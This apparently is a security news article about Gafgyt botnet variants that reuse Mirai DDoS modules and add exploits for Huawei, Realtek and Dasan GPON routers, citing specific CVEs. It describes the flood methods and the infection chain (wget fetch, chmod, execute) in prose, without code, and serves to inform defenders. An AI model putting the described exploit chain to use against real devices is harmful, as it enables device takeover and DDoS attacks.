Gafgyt Botnet Lifts DDoS Tricks from Mirai

The IoT-targeted malware has also added new exploits for initial compromise, for Huawei, Realtek and Dasan GPON devices.

Several variants of the Gafgyt Linux-based botnet malware family have incorporated code from the infamous Mirai botnet, researchers have discovered.

Gafgyt (a.k.a. Bashlite) is a botnet that was first uncovered in 2014. It targets vulnerable internet of things (IoT) devices like Huawei routers, Realtek routers and ASUS devices, which it then uses to launch large-scale distributed denial-of-service (DDoS) attacks. It also often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.

The latest variants have now incorporated several Mirai-based modules, according to research from Uptycs released Thursday, along with new exploits. Mirai variants and its code re-use have become more voluminous since the source code for the IoT botnet was released in October 2016.

The capabilities nicked from Mirai include various methods to carry out DDoS attacks, according to the research:

  • HTTP flooding, in which the botnet sends a large number of HTTP requests to a targeted server to overwhelm it;
  • UDP flooding, where the botnet sends several UDP packets to a victim server as a means of exhausting it;
  • Various TCP flood attacks, which exploit a normal three-way TCP handshake the victim server receives a heavy number of requests, resulting in the server becoming unresponsive;
  • And an STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.

Code comparison for the HTTP DDoS module between Gafgyt and Mirai. Click to enlarge. Source: Uptycs.

Meanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.

The Huawei exploit (CVE-2017-17215) and the Realtek exploit (CVE-2014-8361) are both used for remote code execution (RCE), to fetch and download the Gafgyt payload, according to the analysis.

“The Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using ‘wget’ command, fetches the payload,” according to Uptycs. “[It] gives the execution permission to payload using ‘chmod’ command, [and] executes the payload.”

The GPON exploit (CVE-2018-10561) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.

“The IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,” researchers added.

IoT Botnet Variants Abound

IoT botnets like Gafgyt are constantly evolving. For instance, researchers in March discovered what they said is the first variant of the Gafgyt botnet family to cloak its activity using the Tor network.

Mirai hasn’t disappeared either: a new variant of the botnet was recently discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices. Since mid-February, the variant has been targeting six known vulnerabilities – and three previously unknown ones – in order to infect systems and add them to a botnet.

It’s only the latest variant of Mirai to come to light. Last year, a version dubbed Mukashi was seen taking advantage of a pre-authentication command-injection vulnerability found in Zyxel NAS storage devices.

“Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,” Uptycs researchers said.

To protect against these kinds of botnet infections, users should regularly monitor for suspicious processes, events and network traffic spawned on the execution of any untrusted binary, researchers recommended. And, users should keep all systems and firmware updated with the latest releases and patches.

Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a FREE Threatpost event, “Underground Markets: A Tour of the Dark Economy.” Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what’s for sale, how much it costs, how hackers work together and the latest tools available for hackers. Register here for the Wed., April 21 LIVE event. 


Suggested articles